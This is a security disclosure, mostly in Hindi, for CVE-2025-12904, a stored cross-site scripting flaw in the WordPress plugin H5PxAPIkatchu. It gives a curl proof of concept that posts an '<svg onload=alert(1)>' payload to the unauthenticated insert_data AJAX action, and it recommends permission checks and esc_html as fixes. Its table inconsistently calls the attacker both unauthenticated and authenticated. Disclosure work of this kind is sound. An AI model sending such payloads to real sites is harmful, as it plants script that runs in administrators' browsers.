
Disclosure for CVE-2025-12904
CVE-2025-12904 का प्रकटीकरण
यह रिपॉजिटरी SNORDIAN's H5PxAPIkatchu <= 0.4.16,वर्डप्रेस प्लगइन जिसे otacke ने विकसित किया है, में पाई गई एक भेद्यता का खुलासा करता है।
| CVE ID | प्रकार | घटक | प्रभाव |
|---|---|---|---|
| CVE-2025-12904 | insert_data के माध्यम से अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग | class-table-view.php | प्रमाणित हमलावर JS निष्पादित कर सकता है |
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
--data-urlencode 'action=insert_data' \
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
※यदि ऑब्जेक्ट के अंदर का id मौजूद नहीं है, तो यह विफल हो जाएगा।
insert_data() फ़ंक्शन ने कोई अनुमति जांच नहीं की, जिससे बिना प्रमाणीकरण के दुर्भावनापूर्ण इनपुट सहेजा जा सका। इसके अलावा, ये प्रविष्टियाँ प्रशासन इंटरफ़ेस पर बिना एस्केप किए प्रदर्शित की गईं।
insert_data() फ़ंक्शन अनधिकृत निष्पादन को रोकने के लिए current_user_can का उपयोग करता है।echo $value के बजाय esc_html($value) का उपयोग करके, आप XSS निष्पादन को रोक सकते हैं।PoC बनाना बहुत कठिन था।
--data-urlencode 'xapi={
"object":{"id":"http://localhost:8080/?id=2"},
"result":{"response":"<svg onload=alert(1)>"}
}'
इस भाग को दोहराने में बहुत समय लगा। curl कमांड को और अधिक कुशलता से उपयोग करना सीखना चाहता हूँ। और यह प्लगइन... क्या सब ठीक है? खासकर नाम, और वैसे भी, सा।
नाम: MooseLove
भूमिका: स्वतंत्र सुरक्षा शोधकर्ता / बग हंटर
संपर्क: अनुरोध पर उपलब्ध
यह सलाह सार्वजनिक सुरक्षा जागरूकता के लिए प्रदान की गई है। श्रेय सहित साझा करने के लिए स्वतंत्र।